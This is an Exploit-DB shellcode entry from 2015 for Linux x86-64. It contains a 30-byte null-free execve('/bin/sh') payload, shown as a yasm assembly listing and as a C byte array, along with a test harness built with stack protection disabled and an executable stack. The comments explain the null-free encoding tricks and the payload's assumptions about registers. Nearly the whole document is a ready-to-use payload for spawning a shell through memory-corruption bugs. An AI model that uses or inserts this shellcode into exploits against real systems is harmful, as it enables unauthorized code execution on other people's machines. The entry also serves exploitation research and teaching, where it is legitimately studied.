Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)

EDB-ID:

37362

CVE:

N/A




Platform:

Linux_x86-64

Date:

2015-06-24


/*
William Borskey 2015
Compile the harness with: gcc -fno-stack-protector -z execstack. The shellcode itself is written in 64-bit Intel assembly for yasm. Note that -z execstack is what made the shellcode[] array (which lives in the writable data segment, not on the stack) executable on the kernels this was written for; on kernels where an executable stack no longer implies executable data, the harness segfaults unless the bytes are first copied to an executable buffer (e.g. an RWX mmap region).

  1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
  2 BITS 64
  3 
  4 section .text
  5         global start
  6 
  7 start:
  8         mov rcx, 0x1168732f6e69622f ;load "/bin/sh" as a little-endian 64-bit immediate; the top
  9                                     ;byte is 0x11 padding so the immediate itself contains no 0x00
 10         shl rcx, 0x08               ;left shift 8 bits: drops the single 0x11 padding byte
 11         shr rcx, 0x08               ;right shift 8 bits: string back in place, top byte now 0x00 (NUL terminator)
 12         push rcx                    ;push the immediate value stored in rcx onto the stack
 13         lea rdi, [rsp]              ;rdi = address of "/bin/sh\0" on the stack (execve filename)
                                        ;NOTE: rsi (argv) is never set, so execve gets whatever rsi held on
                                        ;entry; that only works if it is NULL or a valid argv pointer. For a
                                        ;context-independent payload add "xor esi, esi" (2 bytes, null-free)
 14         xor rdx, rdx                ;rdx = NULL (envp)
 15         mov al, 0x3b                ;rax = 0x3b (execve); writing only al keeps the encoding null-free but
                                        ;assumes the upper 56 bits of rax are already zero. That holds in the C
                                        ;harness below (gcc presumably zeroes eax before a call through the
                                        ;unprototyped int (*)() pointer) but not in general; prefer "xor eax, eax" first
 16         syscall                     ;make the syscall
*/

/*
 * The 30 assembled bytes of the listing above, grouped one instruction per
 * line so each group can be checked against the disassembly. No byte is
 * 0x00, so the payload survives string-copy primitives; sizeof(shellcode)
 * is 31 only because of the C string terminator, which is not part of the
 * payload. The payload sets rdi/rdx/al only: rsi (argv) and the upper bytes
 * of rax are taken as-is from the context it runs in.
 */
char shellcode[] =
    "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11"  /* mov  rcx, 0x1168732f6e69622f ; "/bin/sh" + 0x11 pad  */
    "\x48\xc1\xe1\x08"                          /* shl  rcx, 8                   ; drop the pad byte     */
    "\x48\xc1\xe9\x08"                          /* shr  rcx, 8                   ; top byte becomes 0x00 */
    "\x51"                                      /* push rcx                      ; "/bin/sh\0" on stack   */
    "\x48\x8d\x3c\x24"                          /* lea  rdi, [rsp]               ; filename              */
    "\x48\x31\xd2"                              /* xor  rdx, rdx                 ; envp = NULL           */
    "\xb0\x3b"                                  /* mov  al, 0x3b                 ; SYS_execve            */
    "\x0f\x05";                                 /* syscall                                               */

/*
 * Test harness: transfer control into the shellcode[] byte array.
 *
 * The array lives in the writable data segment, so this only works when
 * that segment is mapped executable (see the compile note in the header
 * comment). The pointer is deliberately left unprototyped (int (*)()):
 * the payload writes only al, so it needs the upper bytes of rax to be
 * zero already, and gcc presumably zeroes eax before a call through an
 * unprototyped pointer (variadic-call convention) -- a prototyped
 * void (*)(void) would likely lose that. argc/argv are not used here;
 * whatever the compiler leaves in rsi is what the payload hands to
 * execve as argv.
 */
int main(int argc, char **argv)
{
    int (*run)() = (int (*)()) shellcode;

    run();

    /* Normally unreachable: a successful execve replaces this process, and
     * the payload has no ret, so a failed syscall runs off the end of the
     * array (into its NUL terminator) instead of returning here. */
    return 0;
}